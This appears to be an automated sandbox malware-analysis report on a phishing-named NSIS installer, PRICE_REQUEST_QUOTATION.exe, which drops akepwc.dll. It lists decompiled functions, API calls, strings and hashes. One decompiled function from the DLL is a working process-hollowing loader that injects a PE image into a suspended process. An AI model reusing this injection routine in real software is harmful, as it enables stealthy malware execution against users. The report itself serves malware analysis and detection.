                                        							}
                                        							goto L20;
                                        						}
                                        						__eflags = _a4 & 0x00000004;
                                        						if((_a4 & 0x00000004) != 0) {
                                        							break;
                                        						}
                                        						goto L16;
                                        						L20:
                                        						__eflags = _t93 -  *0x428c50;
                                        						if(_t93 <  *0x428c50) {
                                        							_v12 = E00405FC6(_v12, 0x420c50, _t90);
                                        						}
                                        						 *0x414c40 =  *0x414c40 + _t90;
                                        						_t93 = _t93 - _t90;
                                        						__eflags = _t93;
                                        					} while (_t93 > 0);
                                        					_t82 = 0;
                                        					__eflags = 0;
                                        					goto L24;
                                        				}
                                        			}

                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00402C66
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe,00000400), ref: 00402C82
                                          • Part of subcall function 0040589E: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe,80000000,00000003), ref: 004058A2
                                          • Part of subcall function 0040589E: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
                                        • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe,C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe,80000000,00000003), ref: 00402CCE
                                        Strings
                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E2D
                                        • Null, xrefs: 00402D4C
                                        • C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe, xrefs: 00402C6C, 00402C7B, 00402C8F, 00402CAF
                                        • C:\Users\user\Desktop, xrefs: 00402CB0, 00402CB5, 00402CBB
                                        • soft, xrefs: 00402D43
                                        • Error launching installer, xrefs: 00402CA5
                                        • Inst, xrefs: 00402D3A
                                        • "C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" , xrefs: 00402C55
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                        • String ID: "C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                        • API String ID: 4283519449-1371113636
                                        • Opcode ID: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
                                        • Instruction ID: 196f3fd9364ed88bbd27218647615838fe3130e8ea263fbe41a0cbd6df82c613
                                        • Opcode Fuzzy Hash: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
                                        • Instruction Fuzzy Hash: 6A510871941218ABDB609F66DE89B9E7BB8EF00314F10403BF904B62D1CBBC9D418B9D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 95%
                                        			E00402E8E(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
                                        				signed int _v8;
                                        				long _v12;
                                        				void* _v16;
                                        				long _v20;
                                        				long _v24;
                                        				intOrPtr _v28;
                                        				char _v92;
                                        				void* _t67;
                                        				void* _t68;
                                        				long _t74;
                                        				intOrPtr _t79;
                                        				long _t80;
                                        				void* _t82;
                                        				int _t84;
                                        				intOrPtr _t95;
                                        				void* _t97;
                                        				void* _t100;
                                        				long _t101;
                                        				signed int _t102;
                                        				long _t103;
                                        				int _t104;
                                        				intOrPtr _t105;
                                        				long _t106;
                                        				void* _t107;
                                        
                                        				_t102 = _a16;
                                        				_t97 = _a12;
                                        				_v12 = _t102;
                                        				if(_t97 == 0) {
                                        					_v12 = 0x8000;
                                        				}
                                        				_v8 = _v8 & 0x00000000;
                                        				_v16 = _t97;
                                        				if(_t97 == 0) {
                                        					_v16 = 0x418c48;
                                        				}
                                        				_t65 = _a4;
                                        				if(_a4 >= 0) {
                                        					_t95 =  *0x42ec78; // 0x9ef0
                                        					E004030E2(_t95 + _t65);
                                        				}
                                        				_t67 = E004030B0( &_a16, 4); // executed
                                        				if(_t67 == 0) {
                                        					L34:
                                        					_push(0xfffffffd);
                                        					goto L35;
                                        				} else {
                                        					if((_a19 & 0x00000080) == 0) {
                                        						if(_t97 == 0) {
                                        							while(_a16 > 0) {
                                        								_t103 = _v12;
                                        								if(_a16 < _t103) {
                                        									_t103 = _a16;
                                        								}
                                        								if(E004030B0(0x414c48, _t103) == 0) {
                                        									goto L34;
                                        								} else {
                                        									if(WriteFile(_a8, 0x414c48, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
                                        										L29:
                                        										_push(0xfffffffe);
                                        										L35:
                                        										_pop(_t68);
                                        										return _t68;
                                        									} else {
                                        										_v8 = _v8 + _t103;
                                        										_a16 = _a16 - _t103;
                                        										continue;
                                        									}
                                        								}
                                        							}
                                        							L45:
                                        							return _v8;
                                        						}
                                        						if(_a16 < _t102) {
                                        							_t102 = _a16;
                                        						}
                                        						if(E004030B0(_t97, _t102) != 0) {
                                        							_v8 = _t102;
                                        							goto L45;
                                        						} else {
                                        							goto L34;
                                        						}
                                        					}
                                        					_t74 = GetTickCount();
                                        					 *0x40b5ac =  *0x40b5ac & 0x00000000;
                                        					 *0x40b5a8 =  *0x40b5a8 & 0x00000000;
                                        					_t14 =  &_a16;
                                        					 *_t14 = _a16 & 0x7fffffff;
                                        					_v20 = _t74;
                                        					 *0x40b090 = 8;
                                        					 *0x414c38 = 0x40cc30;
                                        					 *0x414c34 = 0x40cc30;
                                        					 *0x414c30 = 0x414c30;
                                        					_a4 = _a16;
                                        					if( *_t14 <= 0) {
                                        						goto L45;
                                        					} else {
                                        						goto L9;
                                        					}
                                        					while(1) {
                                        						L9:
                                        						_t104 = 0x4000;
                                        						if(_a16 < 0x4000) {
                                        							_t104 = _a16;
                                        						}
                                        						if(E004030B0(0x414c48, _t104) == 0) {
                                        							goto L34;
                                        						}
                                        						_a16 = _a16 - _t104;
                                        						 *0x40b080 = 0x414c48;
                                        						 *0x40b084 = _t104;
                                        						while(1) {
                                        							_t100 = _v16;
                                        							 *0x40b088 = _t100;
                                        							 *0x40b08c = _v12;
                                        							_t79 = E00406034(0x40b080);
                                        							_v28 = _t79;
                                        							if(_t79 < 0) {
                                        								break;
                                        							}
                                        							_t105 =  *0x40b088; // 0x419301
                                        							_t106 = _t105 - _t100;
                                        							_t80 = GetTickCount();
                                        							_t101 = _t80;
                                        							if(( *0x42ecd4 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
                                        								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                        								_t107 = _t107 + 0xc;
                                        								E00404EB3(0,  &_v92);
                                        								_v20 = _t101;
                                        							}
                                        							if(_t106 == 0) {
                                        								if(_a16 > 0) {
                                        									goto L9;
                                        								}
                                        								goto L45;
                                        							} else {
                                        								if(_a12 != 0) {
                                        									_t82 =  *0x40b088; // 0x419301
                                        									_v8 = _v8 + _t106;
                                        									_v12 = _v12 - _t106;
                                        									_v16 = _t82;
                                        									L24:
                                        									if(_v28 != 1) {
                                        										continue;
                                        									}
                                        									goto L45;
                                        								}
                                        								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
                                        								if(_t84 == 0 || _v24 != _t106) {
                                        									goto L29;
                                        								} else {
                                        									_v8 = _v8 + _t106;
                                        									goto L24;
                                        								}
                                        							}
                                        						}
                                        						_push(0xfffffffc);
                                        						goto L35;
                                        					}
                                        					goto L34;
                                        				}
                                        			}

                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00402EF5
                                        • GetTickCount.KERNEL32 ref: 00402F9C
                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402FC5
                                        • wsprintfA.USER32 ref: 00402FD5
                                        • WriteFile.KERNELBASE(00000000,00000000,00419301,7FFFFFFF,00000000), ref: 00403003
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: CountTick$FileWritewsprintf
                                        • String ID: ... %d%%$HLA$HLA
                                        • API String ID: 4209647438-295942573
                                        • Opcode ID: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
                                        • Instruction ID: 15109c7e5c0d48913ae26536c30eb2ff4c12f072ab55fd5dd83b367320b2a29b
                                        • Opcode Fuzzy Hash: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
                                        • Instruction Fuzzy Hash: 2C618E71902219DBDB10DF65EA44AAF7BB8EB04356F10417BF910B72C4D7789A40CBE9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 73%
                                        			E00401751(FILETIME* __ebx, void* __eflags) {
                                        				void* _t33;
                                        				void* _t41;
                                        				void* _t43;
                                        				FILETIME* _t49;
                                        				FILETIME* _t62;
                                        				void* _t64;
                                        				signed int _t70;
                                        				FILETIME* _t71;
                                        				FILETIME* _t75;
                                        				signed int _t77;
                                        				void* _t80;
                                        				CHAR* _t82;
                                        				void* _t85;
                                        
                                        				_t75 = __ebx;
                                        				_t82 = E00402A29(0x31);
                                        				 *(_t85 - 0xc) = _t82;
                                        				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                                        				_t33 = E00405727(_t82);
                                        				_push(_t82);
                                        				if(_t33 == 0) {
                                        					lstrcatA(E004056BA(E00405BC7(0x409c40, "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
                                        				} else {
                                        					_push(0x409c40);
                                        					E00405BC7();
                                        				}
                                        				E00405E29(0x409c40);
                                        				while(1) {
                                        					__eflags =  *(_t85 + 8) - 3;
                                        					if( *(_t85 + 8) >= 3) {
                                        						_t64 = E00405EC2(0x409c40);
                                        						_t77 = 0;
                                        						__eflags = _t64 - _t75;
                                        						if(_t64 != _t75) {
                                        							_t71 = _t64 + 0x14;
                                        							__eflags = _t71;
                                        							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                                        						}
                                        						asm("sbb eax, eax");
                                        						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                        						__eflags = _t70;
                                        						 *(_t85 + 8) = _t70;
                                        					}
                                        					__eflags =  *(_t85 + 8) - _t75;
                                        					if( *(_t85 + 8) == _t75) {
                                        						E0040587F(0x409c40);
                                        					}
                                        					__eflags =  *(_t85 + 8) - 1;
                                        					_t41 = E0040589E(0x409c40, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                        					__eflags = _t41 - 0xffffffff;
                                        					 *(_t85 - 8) = _t41;
                                        					if(_t41 != 0xffffffff) {
                                        						break;
                                        					}
                                        					__eflags =  *(_t85 + 8) - _t75;
                                        					if( *(_t85 + 8) != _t75) {
                                        						E00404EB3(0xffffffe2,  *(_t85 - 0xc));
                                        						__eflags =  *(_t85 + 8) - 2;
                                        						if(__eflags == 0) {
                                        							 *((intOrPtr*)(_t85 - 4)) = 1;
                                        						}
                                        						L31:
                                        						 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t85 - 4));
                                        						__eflags =  *0x42eca8;
                                        						goto L32;
                                        					} else {
                                        						E00405BC7(0x40a440, 0x42f000);
                                        						E00405BC7(0x42f000, 0x409c40);
                                        						E00405BE9(_t75, 0x40a440, 0x409c40, "C:\Users\alfons\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll",  *((intOrPtr*)(_t85 - 0x14)));
                                        						E00405BC7(0x42f000, 0x40a440);
                                        						_t62 = E00405488("C:\Users\alfons\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll",  *(_t85 - 0x28) >> 3) - 4;
                                        						__eflags = _t62;
                                        						if(_t62 == 0) {
                                        							continue;
                                        						} else {
                                        							__eflags = _t62 == 1;
                                        							if(_t62 == 1) {
                                        								 *0x42eca8 =  &( *0x42eca8->dwLowDateTime);
                                        								L32:
                                        								_t49 = 0;
                                        								__eflags = 0;
                                        							} else {
                                        								_push(0x409c40);
                                        								_push(0xfffffffa);
                                        								E00404EB3();
                                        								L29:
                                        								_t49 = 0x7fffffff;
                                        							}
                                        						}
                                        					}
                                        					L33:
                                        					return _t49;
                                        				}
                                        				E00404EB3(0xffffffea,  *(_t85 - 0xc));
                                        				 *0x42ecd4 =  *0x42ecd4 + 1;
                                        				_t43 = E00402E8E( *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 8), _t75, _t75); // executed
                                        				 *0x42ecd4 =  *0x42ecd4 - 1;
                                        				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                                        				_t80 = _t43;
                                        				if( *(_t85 - 0x1c) != 0xffffffff) {
                                        					L22:
                                        					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
                                        				} else {
                                        					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
                                        					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                                        						goto L22;
                                        					}
                                        				}
                                        				FindCloseChangeNotification( *(_t85 - 8)); // executed
                                        				__eflags = _t80 - _t75;
                                        				if(_t80 >= _t75) {
                                        					goto L31;
                                        				} else {
                                        					__eflags = _t80 - 0xfffffffe;
                                        					if(_t80 != 0xfffffffe) {
                                        						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffee);
                                        					} else {
                                        						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffe9);
                                        						lstrcatA(0x409c40,  *(_t85 - 0xc));
                                        					}
                                        					_push(0x200010);
                                        					_push(0x409c40);
                                        					E00405488();
                                        					goto L29;
                                        				}
                                        				goto L33;
                                        			}

















                                        APIs
                                        • lstrcatA.KERNEL32(00000000,00000000,TclpOwkq,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
                                        • CompareFileTime.KERNEL32(-00000014,?,TclpOwkq,TclpOwkq,00000000,00000000,TclpOwkq,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                                          • Part of subcall function 00405BC7: lstrcpynA.KERNEL32(?,?,00000400,004031D8,jwfmxhqapdbzygp Setup,NSIS Error), ref: 00405BD4
                                          • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,00419301,7519EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                          • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,00419301,7519EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                          • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,00419301,7519EA30), ref: 00404F0F
                                          • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                          • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F47
                                          • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F61
                                          • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F6F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                        • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp$C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll$TclpOwkq
                                        • API String ID: 1941528284-1346630671
                                        • Opcode ID: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
                                        • Instruction ID: c8ecff54efbd1983964958a71a4b78ec9a68474d29a8073c081a3edbe3f43163
                                        • Opcode Fuzzy Hash: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
                                        • Instruction Fuzzy Hash: 8541B631904514BBCB107BA6CC45DAF3678EF01329F60823BF521F11E1D63CAA419EAE
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405375(CHAR* _a4) {
                                        				struct _SECURITY_ATTRIBUTES _v16;
                                        				struct _SECURITY_DESCRIPTOR _v36;
                                        				int _t22;
                                        				long _t23;
                                        
                                        				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                        				_v36.Owner = 0x40735c;
                                        				_v36.Group = 0x40735c;
                                        				_v36.Sacl = _v36.Sacl & 0x00000000;
                                        				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                        				_v16.lpSecurityDescriptor =  &_v36;
                                        				_v36.Revision = 1;
                                        				_v36.Control = 4;
                                        				_v36.Dacl = 0x40734c;
                                        				_v16.nLength = 0xc;
                                        				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
                                        				if(_t22 != 0) {
                                        					L1:
                                        					return 0;
                                        				}
                                        				_t23 = GetLastError();
                                        				if(_t23 == 0xb7) {
                                        					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
                                        						goto L1;
                                        					}
                                        					return GetLastError();
                                        				}
                                        				return _t23;
                                        			}








                                        APIs
                                        • CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
                                        • GetLastError.KERNEL32 ref: 004053CC
                                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053E1
                                        • GetLastError.KERNEL32 ref: 004053EB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                        • String ID: C:\Users\user\Desktop$Ls@$\s@
                                        • API String ID: 3449924974-776639217
                                        • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                        • Instruction ID: 9862b429919ab471ad7b2dc8692991af43e8f75a2b46e14c68af8680499b7529
                                        • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                        • Instruction Fuzzy Hash: 78010C71D14219DADF019BA0DC447EFBFB8EB04354F00453AE904B6180E3B89614CFA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 29%
                                        			E7333AFD5(intOrPtr _a4) {
                                        				intOrPtr _v8;
                                        				intOrPtr _v12;
                                        				signed int _v16;
                                        				void* _v20;
                                        				char* _v24;
                                        				intOrPtr _v28;
                                        				char* _v32;
                                        				intOrPtr _v36;
                                        				void _v40;
                                        				intOrPtr _v44;
                                        				struct _PROCESS_INFORMATION _v60;
                                        				intOrPtr _v64;
                                        				intOrPtr _v68;
                                        				intOrPtr _v72;
                                        				intOrPtr _v76;
                                        				intOrPtr _v80;
                                        				intOrPtr _v84;
                                        				intOrPtr _v88;
                                        				intOrPtr _v92;
                                        				struct _STARTUPINFOW _v160;
                                        				struct _CONTEXT _v876;
                                        				short _v1916;
                                        				void* _t155;
                                        				void* _t161;
                                        				intOrPtr _t162;
                                        				void* _t165;
                                        				signed int _t175;
                                        				void* _t186;
                                        
                                        				_v12 = E7333A6C7();
                                        				_v68 = E7333A776(_v12, 0xff7f721a);
                                        				_v76 = E7333A776(_v12, 0x7fe2736c);
                                        				_v80 = E7333A776(_v12, 0x7fa1f993);
                                        				_v84 = E7333A776(_v12, 0x7fa3ef6e);
                                        				_v92 = E7333A776(_v12, 0xff31bf16);
                                        				_v72 = E7333A776(_v12, 0x7fb6c905);
                                        				_t228 = 0x7fb1f910;
                                        				_v88 = E7333A776(_v12, 0x7fb1f910);
                                        				_v64 = _a4;
                                        				_v8 = _a4 +  *((intOrPtr*)(_v64 + 0x3c));
                                        				_t26 = ( *(_v8 + 0x14) & 0x0000ffff) + 0x18; // 0x18
                                        				_v44 = _v8 + _t26;
                                        				_v28 = 0x10;
                                        				_v24 =  &_v60;
                                        				while(_v28 != 0) {
                                        					 *_v24 = 0;
                                        					_v24 = _v24 + 1;
                                        					_v28 = _v28 - 1;
                                        				}
                                        				_v36 = 0x44;
                                        				_v32 =  &_v160;
                                        				while(_v36 != 0) {
                                        					 *_v32 = 0;
                                        					_v32 = _v32 + 1;
                                        					_v36 = _v36 - 1;
                                        				}
                                        				_v20 =  *(_v8 + 0x34);
                                        				_push(0x103);
                                        				_push( &_v1916);
                                        				_push(0);
                                        				if(_v68() != 0) {
                                        					if(CreateProcessW( &_v1916, _v72(), 0, 0, 0, 0x8000004, 0, 0,  &_v160,  &_v60) != 0) {
                                        						_v876.ContextFlags = 0x10007;
                                        						if(GetThreadContext(_v60.hThread,  &_v876) != 0) {
                                        							if(ReadProcessMemory(_v60.hProcess, _v876.Ebx + 8,  &_v40, 4, 0) != 0) {
                                        								_t217 = _v40;
                                        								if(_v40 <  *(_v8 + 0x34)) {
                                        									L18:
                                        									_v20 = VirtualAllocEx(_v60.hProcess,  *(_v8 + 0x34),  *(_v8 + 0x50), 0x3000, 0x40);
                                        									if(_v20 != 0) {
                                        										_push(0);
                                        										_push( *((intOrPtr*)(_v8 + 0x54)));
                                        										_push(_a4);
                                        										_push(_v20);
                                        										_push(_v60.hProcess);
                                        										_t155 = E7333A267(_t217, _t228); // executed
                                        										if(_t155 != 0) {
                                        											_v16 = _v16 & 0x00000000;
                                        											while(_v16 < ( *(_v8 + 6) & 0x0000ffff)) {
                                        												_push(0);
                                        												_push( *((intOrPtr*)(_v44 + 0x10 + _v16 * 0x28)));
                                        												_push(_a4 +  *((intOrPtr*)(_v44 + 0x14 + _v16 * 0x28)));
                                        												_t175 = _v16 * 0x28;
                                        												_t217 = _v44;
                                        												_t228 = _v20 +  *((intOrPtr*)(_t217 + _t175 + 0xc));
                                        												_push(_v20 +  *((intOrPtr*)(_t217 + _t175 + 0xc)));
                                        												_push(_v60.hProcess);
                                        												E7333A267(_t217, _v20 +  *((intOrPtr*)(_t217 + _t175 + 0xc))); // executed
                                        												_v16 = _v16 + 1;
                                        											}
                                        											_push(0);
                                        											_push(4);
                                        											_push( &_v20);
                                        											_push(_v876.Ebx + 8);
                                        											_push(_v60.hProcess);
                                        											_t161 = E7333A267(_t217, _t228); // executed
                                        											if(_t161 != 0) {
                                        												_t162 = _v8;
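                                        												// _t162 + 0x28 matches AddressOfEntryPoint; Eax in the initial x86 thread context is the thread's start address
                                        												_t219 = _v20 +  *((intOrPtr*)(_t162 + 0x28));
                                        												_v876.Eax = _v20 +  *((intOrPtr*)(_t162 + 0x28));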
                                        												if(SetThreadContext(_v60.hThread,  &_v876) != 0) {
                                        													_t165 = E7333A1B6(_t219, _t228, _v60.hThread); // executed
                                        													if(_t165 != 0) {
                                        														return 0;
                                        													}
                                        													return 1;
                                        												}
                                        												return 1;
                                        											}
                                        											return 1;
                                        										}
                                        										return 1;
                                        									}
                                        									return 1;
                                        								}
                                        								_t217 = _v8;
                                        								if(_v40 >  *(_v8 + 0x34) +  *(_v8 + 0x50)) {
                                        									goto L18;
                                        								}
                                        								_t186 = E7333A368(_t217, _t228, _v60, _v40); // executed
                                        								if(_t186 == 0) {
                                        									goto L18;
                                        								}
                                        								return 1;
                                        							}
                                        							return 1;
                                        						}
                                        						return 1;
                                        					}
                                        					return 1;
                                        				}
                                        				return 1;
                                        			}

                                        APIs
                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 7333B119
                                        • GetThreadContext.KERNELBASE(?,00010007), ref: 7333B13C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.275260371.000000007333A000.00000040.00020000.sdmp, Offset: 73330000, based on PE: true
                                        • Associated: 00000000.00000002.275206383.0000000073330000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.275216478.0000000073331000.00000020.00020000.sdmp
                                        • Associated: 00000000.00000002.275237107.0000000073339000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.275275573.000000007333C000.00000080.00020000.sdmp
                                        • Associated: 00000000.00000002.275311441.000000007333E000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: ContextCreateProcessThread
                                        • String ID: D
                                        • API String ID: 2843130473-2746444292
                                        • Opcode ID: d713fed270ea35789bdb38edf5c3ee757c5e0146d0098296e039f2b85e4f24fa
                                        • Instruction ID: b58f2e4882b2839f541ebf51a2a09df04f4014354a2e4b6f7f91e746273dcfc7
                                        • Opcode Fuzzy Hash: d713fed270ea35789bdb38edf5c3ee757c5e0146d0098296e039f2b85e4f24fa
                                        • Instruction Fuzzy Hash: D5A11670E04209EFDB51DFA4CD80BAEBBB9BF09305F508469E516EB2A0D735AA51CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405EE9(intOrPtr _a4) {
                                        				char _v292;
                                        				int _t10;
                                        				struct HINSTANCE__* _t14;
                                        				void* _t16;
                                        				void* _t21;
                                        
                                        				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                                        				if(_t10 > 0x104) {
                                        					_t10 = 0;
                                        				}
                                        				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                                        					_t16 = 1;
                                        				} else {
                                        					_t16 = 0;
                                        				}
                                        				_t5 = _t16 + 0x409010; // 0x5c
                                        				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                                        				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
                                        				return _t14;
                                        			}

                                        APIs
                                        • GetSystemDirectoryA.KERNEL32 ref: 00405F00
                                        • wsprintfA.USER32 ref: 00405F39
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                        • String ID: %s%s.dll$UXTHEME$\
                                        • API String ID: 2200240437-4240819195
                                        • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                        • Instruction ID: fa246daef39c5d1266dc05b53ca8af7bf1dea281c1fa5b10d5a6498bb1fbd0ec
                                        • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                        • Instruction Fuzzy Hash: AAF0F63094050A6BDB14AB64DC0DFFB365CFB08305F1404BAB646E20C2E678E9158FAD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004058CD(char _a4, intOrPtr _a6, CHAR* _a8) {
                                        				signed int _t11;
                                        				int _t14;
                                        				signed int _t16;
                                        				void* _t19;
                                        				CHAR* _t20;
                                        
                                        				_t20 = _a4;
                                        				_t19 = 0x64;
                                        				while(1) {
                                        					_t19 = _t19 - 1;
                                        					_a4 = 0x61736e;
